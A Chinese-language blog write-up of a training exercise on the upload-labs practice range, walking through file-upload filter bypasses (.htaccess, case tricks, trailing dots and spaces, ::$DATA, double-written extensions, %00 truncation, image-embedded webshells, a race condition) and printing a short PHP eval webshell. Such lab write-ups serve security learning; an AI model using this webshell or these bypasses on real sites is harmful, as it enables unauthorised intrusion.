实训第五天

  1. Antsword连接虚拟机
    image-20220715095225330.png

Pass 4
编写.htaccess文件
image-20220715101844886.png

上传.htaccess文件
image-20220715102013581.png

修改后缀
image-20220715102213484.png

加载图片,上传成功
image-20220715102317944.png

Pass 5
这一关吸取了上一关的教训增加了对.htaccess文件的限制
image-20220715103200235.png

但是去掉了对大小写的限制,可以使用PHP后缀
image-20220715103547302.png

上传成功
image-20220715103651019.png

Pass 6
吸取了上几关的教训:既过滤了.htaccess文件,又大小写转换了后缀;但是最后没有去掉后缀后的空格,存在绕过点
image-20220715104139473.png

上传成功
image-20220715104256169.png

Pass 7
未对后缀末尾点号进行过滤
image-20220715105159972.png

上传成功
image-20220715105227685.png

Pass 8
未去除字符串::$DATA,截包后在php后加::$DATA
image-20220715110344968.png

Pass 9
绕过空格和点
image-20220715140744661.png

image-20220715140820867.png

Pass 10
尝试大写PHP绕过,发现上传的文件后缀被删除
image-20220715141148581.png

尝试双写绕过,注意php应该插入第一个p后面,即pphphp,如果插入h后:phphph,替换掉第一个遇到的php成了hph
image-20220715141451565.png

Pass 11
url地址采用拼接方法存在绕过点
改包:将请求行中路径补充上木马文件名,并且添加%00
访问返回的shell路径,去除包含%00造成的乱码字符和后面一切字符,作为真正的shell路径
编写shell

<?php
echo "hello xherlock";
eval($_REQUEST['pass']);
?>

image-20220715144438926.png

image-20220715145135927.png

测试连接

image-20220715145720653.png

Pass 12

做法同Pass 11,不同点在于这关是POST方法改变save_path地方不一样,同时post不会像get对%00进行自动解码,需要对%00进行URL解码

Pass 13

首先制作图片马:copy blank.jpg /b + shell.php /a blankshell.jpg(blank.jpg图片最好为空白)

blankshell.png

上传图片马并查看具体文件地址:

image-20220715160532176.png

查看include.php文件内容:

includephp.png

编写参数传入图片马地址和cmd参数访问phpinfo

pass13-result.png

Pass 14-15

可以直接按照上一关做

Pass16

使用老师发的gif文件木马

pass16-gif.png

Pass 17

从源码来看,服务器先是将上传的文件保存下来,然后将文件的后缀名同白名单对比,如果是jpg、png、gif中的一种,就将文件进行重命名。如果不符合的话,unlink()函数就会删除该文件。

实训期间写的过于仓促,整体写的不好,下来补充upload-lab的分类学习

最后修改:2022 年 07 月 16 日
如果觉得我的文章对你有用,请随意赞赏